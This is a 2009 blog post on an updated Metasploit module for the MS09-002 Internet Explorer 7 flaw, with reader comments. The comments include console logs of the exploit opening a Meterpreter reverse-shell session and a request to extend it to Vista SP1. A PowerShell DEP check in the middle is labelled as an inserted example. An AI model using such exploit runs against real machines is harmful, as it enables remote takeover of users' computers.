Friday, February 20, 2009

MS09_002 Memory Corruption Update


CG just pushed the code to the Metasploit trunk, so go run 'svn update' and enjoy. Any feedback would be good. I'll write up a little something on it, and on how the vuln is triggered, when I get a chance.

dean de beer

9 comments:

Anonymous said...

Thanks for the heads up!

Wondering, is this exploit only possible on an SP0 version of Vista, or could it work on SP1 too? (Considering the IE7 fix hasn't been applied yet...)

dean de beer said...

I did not have a Vista SP1 image to test it on, but try it. The ret used (0x0C..) should be the same. Does SP1 enable opt-out mode for DEP by default? That would include IE7 then, I think, and that will break the sploit.

Let me know how it goes.
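The question above is whether the system-wide DEP policy covers IE7. As an added example (not code from the post or from either commenter), this PowerShell snippet reports the Win32_OperatingSystem DEP support policy and then asks each running 32-bit iexplore.exe directly via GetProcessDEPPolicy; it assumes Vista SP1 (or XP SP3) or later, where that API exists.

```powershell
# Added example, not from the original post: check whether DEP actually covers IE.
# Assumes Windows Vista SP1 / XP SP3 or later (GetProcessDEPPolicy was introduced there).

Add-Type -Namespace Win32 -Name Dep -MemberDefinition @"
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetProcessDEPPolicy(IntPtr hProcess, out uint lpFlags, out bool lpPermanent);
"@

# Documented values of Win32_OperatingSystem.DataExecutionPrevention_SupportPolicy
$policyNames = @{
    0 = 'AlwaysOff'
    1 = 'AlwaysOn'
    2 = 'OptIn (Windows system binaries only)'
    3 = 'OptOut (all programs unless exempted)'
}

$os     = Get-WmiObject Win32_OperatingSystem
$policy = [int]$os.DataExecutionPrevention_SupportPolicy
"System DEP policy : $($policyNames[$policy]) ($policy)"
"Hardware NX avail : $($os.DataExecutionPrevention_Available)"

# Under OptIn a non-system binary such as iexplore.exe is only protected if it opts in
# itself; under OptOut it is protected unless exempted. Confirm per process instead of
# inferring from the policy alone.
foreach ($p in Get-Process -Name iexplore -ErrorAction SilentlyContinue) {
    $flags = [uint32]0
    $permanent = $false
    if ([Win32.Dep]::GetProcessDEPPolicy($p.Handle, [ref]$flags, [ref]$permanent)) {
        $enabled = ($flags -band 1) -ne 0   # PROCESS_DEP_ENABLE
        "iexplore.exe PID $($p.Id): DEP enabled=$enabled permanent=$permanent"
    } else {
        # Fails for 64-bit processes and for handles without PROCESS_QUERY_INFORMATION
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        "iexplore.exe PID $($p.Id): GetProcessDEPPolicy failed (Win32 error $err)"
    }
}
```

Run it from an elevated prompt so the process handles carry query rights; a result of DEP enabled=True for iexplore.exe is the condition the comment above expects to break the module.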

Anonymous said...

Building up the Vista SP1 image as we speak. I'll get back to you ASAP.

Anonymous said...

Building up the Vista SP1 image as we speak. I'll get back to you ASAP.

Hmmm... just tried it; it does not seem to work on a test computer running SP1. Doing further testing, as I don't know if it has the IE7 fix installed.

Anonymous said...

Oddly, mine and the committed module look the same?

With some slight modifications to the heap code, exploitation on IE7/Vista SP1 is possible.

msf exploit(ms09_002_deleteobject) > rexploit
[*] Exploit running as background job.
msf exploit(ms09_002_deleteobject) >
[*] Handler binding to LHOST 172.10.1.103
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vistasp1
[*] Local IP: http://172.10.1.103:8080/vistasp1
[*] Server started.
[*] Target is Windows Vista
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Overflow to 172.10.1.105:49277...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.10.1.103:65535 -> 172.10.1.105:49278)

msf exploit(ms09_002_deleteobject) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: DA-RIZZLE
OS : Windows 2000 (Build 6001, Service Pack 1).
meterpreter >

CG said...

Well, overwrite that shizzle with the SP1 version, I'm sure everyone won't mind :-)

Anonymous said...

Oh yeah, that would be nice, being able to play with SP1 too! Please update the exploit to support SP1!

Anonymous said...

msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[-] Exploit failed: Permission denied - bind(2)

Where's the prob? Help!

Anonymous said...

Solved my own prob, thanks!